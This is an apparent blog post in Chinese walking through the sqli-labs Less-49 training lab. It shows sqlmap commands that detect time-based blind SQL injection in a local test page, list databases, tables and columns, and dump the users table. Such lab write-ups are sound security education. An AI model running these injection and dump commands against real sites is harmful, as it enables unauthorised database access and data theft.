sqli-labs-Less-49

heze092026-03-17 9:17

SQLI-LAPS 实验记录

Less-49

这一关与上一关类似,也是盲注,页面上没有任何反馈信息,同样我们采用sqlmap工具来帮助进行自动化注入。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch

结果如图所示,只有时间盲注方式可以选择,接下来我们继续采用sqlmap自动化注入。

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch --dbs

结果如图所示,页面返回数据库的名称,注入有效。

之后,我们可以继续使用sqlmap注入的方式,对表名、列名等内容进行注入。

  • 爆出表名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security --tables
  • 爆出列名:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --columns
  • 爆出内容:
php 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-49/?sort=1 --batch -D security -T users --dump
相关推荐
睡不醒男孩0308232 小时前
第二篇:深入探索开源数据库高可用:构建基于CLup的PostgreSQL生产级高可用与读写分离架构
数据库·postgresql·开源·clup
Micro麦可乐4 小时前
Spring Boot 实战:从零设计一个短链系统(含完整代码与数据库设计)
数据库·spring boot·后端·哈希算法·雪花算法·短链系统
码农阿豪4 小时前
从零到一:Spring Boot快速接入金仓数据库实战
数据库·spring boot·后端
鼎讯信通4 小时前
风电光缆运维提质增效:G-4000A 光缆故障追踪仪破解风场巡检难题
运维·网络·数据库
三十..5 小时前
MySQL 从入门到高可用架构实战精要
运维·数据库·mysql
cfm_29145 小时前
Redis五大基本数据结构底层了解
数据结构·数据库·redis
lcreek6 小时前
SQL 注入实战:DVWA Medium完整测试指南
网络安全·sql注入
真实的菜6 小时前
Redis 从入门到精通(十二):典型业务场景实战 —— 排行榜、限流器、秒杀系统、Session 共享
数据库·redis·python
你想考研啊6 小时前
mysql数据库导出导入
数据库·mysql·oracle
十年编程老舅7 小时前
Linux DRM:底层逻辑与实践架构
数据库·mysql
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03Codex 下载安装指南:Windows 和 macOS 官方版下载042026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法07CC-Switch 下载、安装与使用配置指南【2026.5.29】08Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试09CC-Switch & Claude 基于 Linux 服务器安装使用指南10AI科技热点日报 | 2026年6月1日